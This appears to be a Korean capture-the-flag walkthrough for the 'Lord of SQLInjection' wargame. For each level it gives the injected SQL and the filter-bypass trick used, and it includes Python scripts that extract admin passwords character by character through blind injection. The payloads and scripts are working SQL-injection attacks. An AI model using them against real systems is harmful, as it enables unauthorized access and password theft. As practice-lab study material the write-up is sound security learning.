gremlin
select id from prob_gremlin where id='' or 1=1%23' and pw=''
주석(#)이 삭제되므로 URL 인코딩해서 넣음
cobolt
select id from prob_cobolt where id='admin'%23' and pw=md5('')
admin id가 select되도록 함
주석(#)이 삭제되므로 URL 인코딩해서 넣음
goblin
select id from prob_goblin where id='guest' and no=0 or id=char(97,100,109,105,110)
and연산을 Flase로(id가 guest인 것을 Flase), id가 admin인 것을 True로 만듬
싱글쿼터를 필터링하여 'admin'문자열을 아스키코드로 표현함
orc (blind Injection)
단순히 쿼리의 결과를 참으로 만들어서 풀리는 문제가 아님. 전달한 값과 admin의 패스워드가 정확히 일치해야 풀리는 문제임.
select id from prob_orc where id='admin' and pw='' or id='admin' and length(pw)='8'
우선 pw길이를 알아냈음
select id from prob_orc where id='admin' and pw='' or id='admin' and ascii(substr(pw,1,1))='50'
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | import requests url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php" cookies = {"PHPSESSID": "~~~~~"} def pw_length(): for len in range(1, 11): params={"pw":"\' or id=\'admin\' and length(pw)=\'%d" %(len)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): print("password length is ",len) return len def pw_string(len): password="" for idx in range(1, len+1): for pw in range(33, 126): params={"pw":"\' or id=\'admin\' and ascii(substr(pw,%d,1))=\'%d" %(idx, pw)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): password += (chr(pw)) break print("password is ",password) if __name__=="__main__": print('-------------Getting Password Length-------------') len=pw_length() print('-------------Getting Password String-------------') pw_string(len) | cs |
방법 1. select id from prob_wolfman where id='guest' and pw=''%0aor%0aid='admin'
공백이 필터링 되므로 공백대신 Line Feed(\n)을 URL 인코딩해서 넣음
방법2. select id from prob_wolfman where id='guest' and pw=''/**/or/**/id='admin'
패스워드의 첫번째 문자를 알아냄
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | import requests url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php" cookies = {"PHPSESSID": "~~~~~"} def pw_length(): for len in range(1, 11): params={"pw":"\' || id=\'admin\' && length(pw)=%d#" %(len)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): print("password length is ",len) return len def pw_string(len): password="" for idx in range(1, len+1): for pw in range(33, 126): params={"pw":"\' || id=\'admin\' && ascii(substr(pw,%d,1))='%d#" %(idx, pw)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): password += (chr(pw)) break print("password is ",password) if __name__=="__main__": print('-------------Getting Password Length-------------') len=pw_length() print('-------------Getting Password String-------------') pw_string(len) | cs |
위와 같은 파이썬 코드로 작성하였음
(&와 #를 url 인코딩을 하지 않은 채로 작성함)
troll
select id from prob_troll where id='Admin'
ereg함수로 'admin'이라는 문자열을 필터링하고 있었음
ereg함수는 대소문자를 구별하므로 Admin으로 넣었음
(참고로 eregi는 대소문자를 구별하지 않음)
vampire
select id from prob_vampire where id='aadmindmin'
"admin"을 ""으로 치환하고 있어서 위와 같이 해결함
skeleton
select id from prob_skeleton where id='guest' and pw='' or id='admin'%23' and 1=0
앞의 and문을 false로 만든 후 or문을 True로 만들고 뒤에는 주석(%23)처리 함
golem (blind injection)
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 length(pw) like 8%23'
=을 필터링하고 있어서 대신 like를 사용하고 &와 #(주석)도 각각 %26, %23으로 우회하여 패스워드의 길이를 알아냄
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 ascii(mid(pw,1,1)) like 56%23'
substr을 필터링하고 있어서 같은 기능을 하는 mid를 사용하여 패스워드의 문자를 알아냄
select id from prob_golem where id='guest' and pw='' || id like 'admin' %26%26 ascii(right(left(pw,1),1)) like 56%23'
mid 함수뿐만 아니라 right와 left함수로도 우회가 가능함
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | import requests url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php" cookies = {"PHPSESSID": "~~~~~"} def pw_length(): for len in range(1, 11): params={"pw":"\' || id like \'admin\' && length(pw) like %d#" %(len)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): print("password length is ",len) return len def pw_string(len): password="" for idx in range(1, len+1): for pw in range(33, 126): params={"pw":"\' || id like \'admin\' && ascii(mid(pw,%d,1)) like %d#" %(idx, pw)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): password += (chr(pw)) break print("password is ",password) if __name__=="__main__": print('-------------Getting Password Length-------------') len=pw_length() print('-------------Getting Password String-------------') pw_string(len) | cs |
위와 같은 파이썬 코드로 작성하였음
darknight (blind injection)
방법 1. select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110)
select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110) and length(pw) like 8
select id from prob_darkknight where id='guest' and pw='' and no=-999 or id like char(97,100,109,105,110) and ord(mid(pw,1,1)) like 49
ascii 함수가 필터링되어 아스키코드 10진수로 변환해주는 ord함수를 사용함
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 | import requests url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php" cookies = {"PHPSESSID": "~~~~~"} def pw_length(): for len in range(1, 11): params={"no":"-999 or id like char(97,100,109,105,110) and length(pw) like %d" %(len)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): print("password length is ",len) return len def pw_string(len): password="" for idx in range(1, len+1): for pw in range(33, 126): params={"no":"-999 or id like char(97,100,109,105,110) and ord(mid(pw,%d,1)) like %d" %(idx, pw)} response = requests.get(url, params=params, cookies=cookies) if("Hello admin" in response.text): password += (chr(pw)) break print("password is ",password) if __name__=="__main__": print('-------------Getting Password Length-------------') len=pw_length() print('-------------Getting Password String-------------') pw_string(len) | cs |
위와 같은 파이썬 코드로 작성함
bugbear (blind injection)
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")%0a%26%26length(pw)in(8)
select id from prob_bugbear where id='guest' and pw='' and no=-999%0a||%0aid%0ain("admin")%26%26hex(mid(pw,1,1))in(hex(55))